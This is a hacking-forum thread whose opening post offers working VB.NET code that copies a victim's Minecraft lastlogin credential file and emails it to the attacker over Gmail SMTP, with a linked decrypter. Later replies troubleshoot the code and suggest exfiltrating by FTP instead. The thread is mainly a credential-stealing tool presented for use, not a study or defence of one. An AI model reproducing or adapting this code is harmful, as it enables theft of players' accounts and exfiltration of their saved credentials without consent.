Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average


Tutorial Steal Minecraft Accounts filter_list
Author
Message
Steal Minecraft Accounts #1
Hey guys, I came up with this method around 6 months ago, and never thought to improve/share it, so here it is.

What It Is:
It copies the .minecraft/lastlogin file and emails it to your own email address via SMTP.

How It's Done:
I created this very basic 'program' in VB a while ago, It should be fairly easy to convert it into another language, or integrate this into another program.

Let's Make this thing!
Due to the lastlogin file being encrypted, you can use this program to 'decrypt' it.
WARNING: This will only work if they have the 'Remember Password' option ticked.
lastlogin decrypter: Download
VB Code:
Code:
Imports System.Net.Mail
Public Class Form1
    Dim smtp As New SmtpClient
    Dim mail As New MailMessage


    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click

        Dim MyMailMessage As New MailMessage()
        Try
            Dim Attch As Net.Mail.Attachment = New Net.Mail.Attachment(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\.minecraft\lastlogin")
            MyMailMessage.Attachments.Add(Attch)
            MyMailMessage.From = New MailAddress("senderaddress@gmail.com")
            MyMailMessage.To.Add("receiveraddress@googlemail.com")
            MyMailMessage.Subject = ("Last Login File")
            MyMailMessage.Body = (" ")
            Dim SMTP As New SmtpClient("smtp.gmail.com")
            SMTP.Port = 587
            SMTP.EnableSsl = True
            SMTP.Credentials = New System.Net.NetworkCredential("senderaddress@gmail.com", "senderpassword")
            SMTP.Send(MyMailMessage)
        Catch ex As Exception
        End Try
        MsgBox("Popup after button press.")
    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    End Sub
End Class

I hope you can take this and develop off of it, If you need any help just comment, I may work on this and try to expand and improve on it.
Peace!

Reply

RE: Steal Minecraft Accounts #2
Seems like easy enough code, just know if you use this your emails will get stolen. (Probably by me)
Encrypt your malware kids.

Reply

RE: Steal Minecraft Accounts #3
I have some VB errors when i input code

Reply

RE: Steal Minecraft Accounts #4
Add the buttons and whatnot that are in the code.

Reply

RE: Steal Minecraft Accounts #5
(04-28-2013, 01:57 AM)Kirito Wrote: Seems like easy enough code, just know if you use this your emails will get stolen. (Probably by me)
Encrypt your malware kids.

Yeah I know, just for an example tryed to keep it as simple as possible Smile

Reply

RE: Steal Minecraft Accounts #6
i make on but no email ftp and some computers on mail give an error...

Reply

RE: Steal Minecraft Accounts #7
(10-14-2013, 08:23 PM)ksocially Wrote: i make on but no email ftp and some computers on mail give an error...

Careful on gravedigging and grammar man.. Please could you refine your question?

Reply

RE: Steal Minecraft Accounts #8
What i said is if you make this by uploading the file buy FTP its better becouse some computers block Vb.net Mail Feature...
Make something like this:

- FTP Connection:
- %username%/lastlogin
...


Sorry for bad english ... Portuguese Style XD

Reply

RE: Steal Minecraft Accounts #9
I made an eBook with a method similar to this a while back.

Reply

RE: Steal Minecraft Accounts #10
This reeks a tad bit of gravedigging.
You could just PM the OP and avoid such an incident.
[Image: qOXNZIL.png]

Reply







Users browsing this thread: 1 Guest(s)